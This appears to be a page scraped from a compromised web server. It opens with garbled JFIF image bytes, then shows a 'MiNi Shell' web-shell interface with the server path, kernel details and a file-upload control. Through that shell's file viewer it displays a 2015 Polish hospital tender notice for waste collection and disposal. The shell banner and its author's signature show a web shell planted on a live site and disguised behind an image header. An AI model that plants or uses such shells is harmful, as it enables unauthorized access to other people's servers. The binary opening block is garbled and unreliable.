JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/201204-N-2015.html

<p class="kh_header"><b>Tarnowskie Góry: USŁUGA ODBIORU,  WYWOZU I UTYLIZACJI NIESEGREGOWANYCH I SEGREGOWANYCH  ODPADÓW KOMUNALNYCH Z OBIEKTÓW WIELOSPECJALISTYCZNEGO SZPITALA POWIATOWEGO S.A.
W TARNOWSKICH GÓRACH</b><br>
<b>Numer ogłoszenia: 201204 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA ODBIORU,  WYWOZU I UTYLIZACJI NIESEGREGOWANYCH I SEGREGOWANYCH  ODPADÓW KOMUNALNYCH Z OBIEKTÓW WIELOSPECJALISTYCZNEGO SZPITALA POWIATOWEGO S.A.
W TARNOWSKICH GÓRACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wywóz i utylizacja niesegregowanych i segregowanych  odpadów komunalnych wytwarzanych w obiektach Wielospecjalistycznego Szpitala Powiatowego S.A., zlokalizowanych w Tarnowskich Górach przy ulicy  Pyskowickiej 47-51, Opolskiej 21 
2. Szczegółowy opis przedmiotu zamówienia 
Lokalizacja ul. Pyskowicka 47-51
Pozycja 1.   200301 -  niesegregowane odpady komunalne
Podstawienie  pojemnika o pojemności 7 m3 (+    - 10%) w  miejscu przeznaczonym do gromadzenia odpadów wcześniej  w workach foliowych 60l i 120l. w kolorze niebieskim lub czarnym,  odbiór
 4 razy  w tygodniu-  poniedziałek,wtorek,czwartek,sobota .=16 wywozów w  m-cu x 24 m-ce =384 wywozy = 2688 m3.)
Pozycja 2.   200102 -   papier i tektura- odbiór bezpłatny
Podstawianie 1 pojemnika o pojemności 7 m3 (+    - 20%) każdy w  miejscu przeznaczonym na gromadzenie odpadów i ich odbiór po zapełnieniu pojemnika. Pojemnik ma umożliwić selektywną zbiórkę pojedynczego odpadu gromadzonego wcześniej w workach foliowych. 120l  w kolorze  niebieskim lub czarnym,
odbiór  pojemnika  3 wywozy w m-cu  x 24 m-ce = 72 wywozy  = 5000 kg
Pozycja 3.   200101 - szkło  - odbiór bezpłatny
Podstawienie 2 pojemników o pojemności 1,1 m3 (+    - 20 %) każdy w  miejscu przeznaczonym do gromadzenia odpadów i ich odbiór po zapełnieniu pojemnika. Pojemnik ma umożliwić selektywną zbiórkę pojedynczego odpadu  gromadzonego wcześniej  w workach foliowych 120 l w kolorze niebieskim lub czarnym,
odbiór pojemników 4 razy  w m-cu x 24 m-ce = 96 wywozów  = 800 kg
Pozycja 4.   200139 - tworzywa sztuczne - odbiór bezpłatny
Podstawienie pojemników  o pojemności 1,1 m3 (+    - 20 %)  przeznaczonym na gromadzenie odpadów i ich odbiór po napełnieniu pojemnika. Pojemnik ma umożliwić selektywną zbiórkę pojedynczego odpadu,  gromadzonego  wcześniej  w workach foliowych 120 l w kolorze niebieskim lub czarnym, odbiór   pojemników  10 razy  w m-cu  x 24 m-ce  = 240 wywozy = 5 000 kg
Pozycja 5.   200201 - odpady ulegające biodegradacji liście, trawa konary i gałęzie z drzew
Podstawienie  kontenera o  pojemności 5 m3 i  wywóz po telefonicznym zgłoszeniu, odbiór pojemnika 
3 razy  w m-cux 24 m-ce = 72 wywozy = 500 m3
Pozycja 6.  170101 - odpady ( gruz i  inne materiały  z rozbiórek  budowlanych),
Podstawienie  kontenera o  pojemności 5 m3 i  wywóz po telefonicznym zgłoszeniu, odbiór pojemnika  średnio  1 raz  w m-cu x 24 m-ce = 24 wywozy  = 300 m3.
Pozycja 7. 191201 - wszelkie odpady papierowe  z dokumentacji  archiwalnej - tajnej ich odbiór i utylizacja  po telefonicznym zgłoszeniu średnio  10 pojemników o poj. 240l  w ciągu roku x 2 = 20 pojemników= 1 000 kg
Pozycja 8.   200307 - odpady wielkogabarytowe
Podstawienia i odbioru po zapełnieniu pojemnika, w ciągu 3 dni po telefonicznym zgłoszeniu, 
 3 razy w ciągu roku.x 2 = 6 wywozów = 200m3
Lokalizacja  ul. Opolska 21
Pozycja 1.   200301 -  niesegregowane odpady komunalne
Podstawienie  1 pojemnika o pojemności 5 m3 (+    - 10%) w  miejscu przeznaczonym do gromadzenia odpadów w workach foliowych 60l i 120l  w kolorze niebieskim lub czarnym, odbiór po zapełnieniu pojemnika  
3 razy w  m-cu x 24 m-ce = 72 wywozy =  360 m3
Pozycja 2.   200102 -   papier i tektura -  odbiór  bezpłatny  
Podstawianie 1 pojemnika o pojemności 1,1 m3 (+    - 20%) każdy w  miejscu przeznaczonym na gromadzenie odpadów i ich odbiór po zapełnieniu pojemnika.  raz w miesiącu,   po telefonicznym zgłoszeniu. Pojemnik ma umożliwić selektywną zbiórkę pojedynczego odpadu gromadzonego w workach  foliowych 120 l  w kolorze niebieskim lub czarnym , odbiór 1 raz w m-cu x 24 m-ce =  24 wywozy =  400 kg.
Pozycja 3.   200101 - szkło  -   odbiór  bezpłatny
Podstawienie 1 pojemników o pojemności 1,1 m3 (+    - 20 %) każdy w  miejscu przeznaczonym do gromadzenia odpadów  po zapełnieniu pojemnika., i ich  odbiór  raz w miesiącu,   po telefonicznym zgłoszeniu Pojemnik ma umożliwić selektywną zbiórkę pojedynczego odpadu gromadzonego  w workach  foliowych 120 l  w kolorze  niebieskim lub czarnym ,odbiór 1 raz w m-cu x 24 m-ce = 24 wywozy = 200 kg
Pozycja 4.   200139 - tworzywa sztuczne- odbiór  bezpłatny
Podstawienie 2 pojemników o pojemności 1,1m3 (+    - 20 %) każdy w miejscu przeznaczonym na gromadzenie odpadów,  odbiór po napełnieniu pojemnika.  raz w tygodniu,   po telefonicznym zgłoszeniu Pojemnik ma umożliwić selektywną zbiórkę pojedynczego odpadu gromadzonego  w workach  foliowych 120 l  w kolorze niebieskim lub czarnym, odbiór 2 razy  w m-cu x 24 m-ce = 48 wywozów =500 kg
Pozycja 5.   200307 - odpady ulegające biodegradacji liście,trawa konary i gałęzie z drzew
Podstawienie  kontenera o  pojemności 5 m3 i  wywóz po telefonicznym zgłoszeniu, 
odbiór  2 razy  w m-cu x 24 m-ce = 48 wywozów= 300 m3
Pozycja 6.  200201 - odpady (gruz i  inne materiały  z  rozbiórek  budowlanych),
 Podstawienie  kontenera o  pojemności 5 m3 i  wywóz po telefonicznym zgłoszeniu, odbiór  średnio 10 razy  w ciągu roku.x 2 = 20 wywozów = 100 m3
Pozycja 7. 191201 - wszelkie odpady papierowe  z dokumentacji archiwalnej - tajnej.
Odbiór  i utylizacja po telefonicznym zgłoszeniu , 2 pojemniki  o poj.240l w ciagu roku x 2 = 4  pojemniki = 100 kg
Dopuszcza się  zmiany przez Zamawiającego  w zakresie  częstotliwości  odbioru i  wielkości pojemników  do odbioru  segregowanych  odpadów komunalnych.
Wykonawca zobowiązany jest do wykonania instrukcji,  plakatów informacyjnych  dotyczących  segregacji odpadów  w miejscach ich wytworzenia.  
3. Odbiór odpadów odbywać się będzie  w godzinach od 8.00 - 13.00.
4. Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych 
   od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie
   rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
5. Nie odebranie odpadów w terminie podanym w § 1 uprawnia Zamawiającego do
    zaangażowania innych osób prawnych lub fizycznych (tzw. wykonanie zastępcze) w celu
    realizacji przedmiotu umowy zgodnego z niniejszą umową. Koszty tzw. wykonania
    zastępczego będą obciążać wykonawcę.
6. Wywóz odpadów będzie potwierdzany przez stosowny  kwit, podpisany przez 
    Wykonawcę oraz Zamawiającego wraz z wyszczególnieniem ilości wywożonych 
    odpadów, ustalonej na podstawie wagi oraz daty wykonanej usługi.
7. Usługa będzie realizowana  w sposób zgodny z zasadami gospodarowania odpadami, wymaganiami ochrony środowiska oraz planami gospodarki odpadami w oparciu o aktualnie obowiązujące akty prawne  
- Ustawa z dnia 27 kwietnia 2001r. - Prawo ochrony środowiska  t.j. Dz.U.2013.1232 z późn. zm.    .
-. Ustawa z dnia 14 grudnia 2012 r.o odpadach t.j. Dz.U.2013.21 z późn. zm.    .
- Ustawa z 15 stycznia 2015 r. o zmianie ustawy o odpadach oraz niektórych innych ustaw (Dz U. z 2015 r., poz. 122),
8.Wykonawca zobowiązuje się do przekazywania odebranych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada
           przewidziane prawem zezwolenia na zbieranie i transport odpadów, w myśl przepisów ustawy  
           o odpadach oraz aktualne zezwolenie właściwego organu na prowadzenie działalności 
          w zakresie odbierania odpadów stałych komunalnych tj.
  - Wykonawca przedłoży zezwolenia lub zezwolenie (decyzję) właściwych organów administracji publicznej na prowadzenie działalności gospodarczej w zakresie objętym przedmiotem zamówienia zgodnie z wymogami Ustawy z dnia 14.12.2012 r. o odpadach (tekst jednolity Dz. U. z 2013, poz. 21), 
- złożyć aktualne pozwolenie na odbiór odpadów z terenu miasta Tarnowskie Góry.  

Wszystkie decyzje i zezwolenia musi posiadać Wykonawca nawet jeżeli część zamówienia będzie realizował podwykonawca, z wyłączeniem sytuacji gdy Wykonawcy ubiegają się wspólnie o udzielenie zamówienia zgodnie z art.23 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2013 r., poz.907 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający wymaga aby Wykonawca potwierdził spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający wymaga aby Wykonawca potwierdził spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający wymaga aby Wykonawca potwierdził spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj.  złożyć opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 180.000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C.1], [C.2] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Czas realizacji odbioru odpadów - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2. Zamawiający dopuszcza zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny oraz zmiany w przypadku ustawowej zmiany stawki podatku VAT.
3. Zamawiający dopuszcza zmiany:
a) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego; 
b) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynnik zewnętrzny, którego nie można było przewidzieć z pewnością, a w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach; 
c) z powodu działania osób trzecich uniemożliwiających wykonanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział Zamówień Publicznych, budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2015 godzina 09:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Sekretariat, budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com